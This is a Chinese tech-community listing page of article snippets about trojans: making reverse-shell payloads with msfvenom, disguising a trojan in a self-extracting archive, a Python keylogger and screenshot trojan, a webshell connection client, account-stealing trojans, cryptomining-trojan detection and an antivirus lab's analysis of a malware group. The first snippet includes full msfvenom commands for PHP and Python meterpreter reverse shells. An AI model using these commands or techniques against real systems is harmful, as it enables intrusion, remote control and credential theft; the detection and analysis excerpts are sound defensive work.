添加链接
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
首页
学习
活动
专区
工具
TVP
最新优惠活动
发布
精选内容/技术社群/优惠产品, 尽在小程序
立即前往
  • 浅谈 木马

    环境: 攻击者:kali 目标主机:Windows 一、了解 木马 1. 木马 ,又称为特洛伊 木马 特洛伊 木马 (Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。...-p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php python 木马 msfvenom...-p python /meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py 利用msfvenom制作 木马 时...三、 木马 的危害 由于本文探讨 木马 远控,这里就暂时省略文件上传、命令执行下载 木马 等方式将 木马 传入目标主机的讨论。... 木马 捆绑: 制作自解压 木马 (准备一个 木马 、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压 木马 ,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的 木马 程序,从而被控制。

    260 2 0

    如何使用 Python 编写简易 木马 程序

    这次我们使用 Python 编写一个具有键盘记录、截屏以及通信功能的简易 木马 。依然选用Sublime text2 +JEDI( python 自动补全插件)来撸代码。...首先准备好我们需要的依赖库, python hook和pythoncom。 下载(这个链接和原文一致)安装 python hook 下载安装pythoncom模块: ?... Python 之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用 Python ”。...0x03 综合运用:完成一个简易 木马 无论是keylogger记录下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需要构建一个简单server和client端来进行通信...服务端接收到客户端的请求并作出响应: 0x04 结语 最后,你需要做的就是把上面三个模块结合起来,一个简易的具有键盘记录、屏幕截图并可以发送内容到我们服务端的 木马 就完成了。

    3.2K 2 1

    基于 Python 3的 木马 连接工具编写

    类似前言一样的废话 上一次的文章中是分析了 Windows系统上 中国菜刀的工作原理,于是突发奇想,便想着用 Python 3也写一个和菜刀功能一样的程序出来,其实可变的地方还是挺少的,考虑的点只有4个而已...内容中,尤其是正则匹配部分尤其辣眼睛,所以有意见可以提出来,然后我忽略掉就好了 为了方便测试,所以我是在本地的虚拟机搭建一个 apache+php的环境然后在其根目录下放置一个 php一句话 木马 ...开始乱写 首先我们要确定我们连接上 木马 文件,所需要什么东西 文件url 木马 参数 没有这两个就无法建立连接,所以开头的时候先把他安排上 url=str(input(" 木马 url: ")) parameter...url地址)parameter( 木马 参数)和无关紧要的header(http头部) ?...整合后的代码公众号后台留言 Python 菜刀即可

    1.4K 3 0

    挖矿 木马 详解

    一分钟了解什么是挖矿 木马 什么是挖矿 木马 ?...挖矿 木马 自查 挖矿 木马 自查 CPU使用率 通常对挖矿 木马 的感知,主要表现在主机的使用感上,在主机正常运行的情况下,突然变得卡顿,并且CPU的使用率高于正常使用时的数值或达到了100%: 感知产品...当然,仅从卡顿和CPU使用率来判断是否中了挖矿 木马 是不准确的,从安全产品上能够更加准确直观的发现挖矿 木马 。...,即主机请求了“驱动人生”挖矿 木马 的相关域名。...网页挖矿 网页挖矿是指攻击者将挖矿 木马 植入正常网站,只要访问者通过浏览器浏览被恶意植入了网页挖矿 木马 站点,浏览器会即刻执行挖矿指令。

    11.9K 6 1

    木马 盗号《一》

    这一节主要给大家分享的是黑客是如何利用 木马 进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。...但是这样就不太真实,自己写的小程序显然没有防御措施,模拟不了真实环境,体会不到写盗号 木马 的乐趣-。-! 后面的实战环节就会碰到一些问题,后面我会说明。...由于本次只是 木马 主要功能原理介绍,所以我并不介绍 木马 怎么隐藏、怎么绕过360防御(本文 木马 很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。...对于本次盗号 木马 ,我觉得通过病毒感染的插入方式进行代码运行比较好。当然也可以进行捆绑,可以另起一个DLL,或者服务等等。但是插入式首先目标定位精准,因为他只影响WeGame。...于是我打算从更底层的驱动级别模拟开始,但是这样 木马 隐蔽性就下降了很多了,因为我们必须加载驱动了,没办法只可以这样了。事实证明,这次是成功的O(∩_∩)O --------。

    1.5K 3 0

    来自云端的 木马 :“百家” 木马 集团分析

    0×00背景 近日,腾讯反病毒实验室拦截到一批伪装成客户通知单的 木马 ,该 木马 会根据自身文件名的不同而进行多种不同的恶意行为,经测试,目前国内的多款杀毒软件尚不能查杀该病毒,多个 木马 的变种MD5被多款安全软件加入到白名单中...该 木马 近期持续活跃,传播量上万,该 木马 有以下特点: 1)通过文件名控制自身行为,根据不同的文件名有着多达六十多种不同的行为。...3)篡改本地受信任数字证书列表,并构造证书给 木马 签名,逃避查杀。 0×01 木马 文件概况 ?...,当然PlayLoad中还包含有少量的QQ粘虫 木马 (如ID 46),及其他游戏盗号 木马 。...0×03后记: 经过对 木马 加载器的详细分析和配置信息的猜测解读,做出如下图猜测, 木马 作者负责 木马 的免杀(同一个文件),并通过SQL Server上的配置信息来管理和销售 木马 ,每卖出一个 木马 作者便为牧马人开立一个帐号

    1.4K 7 0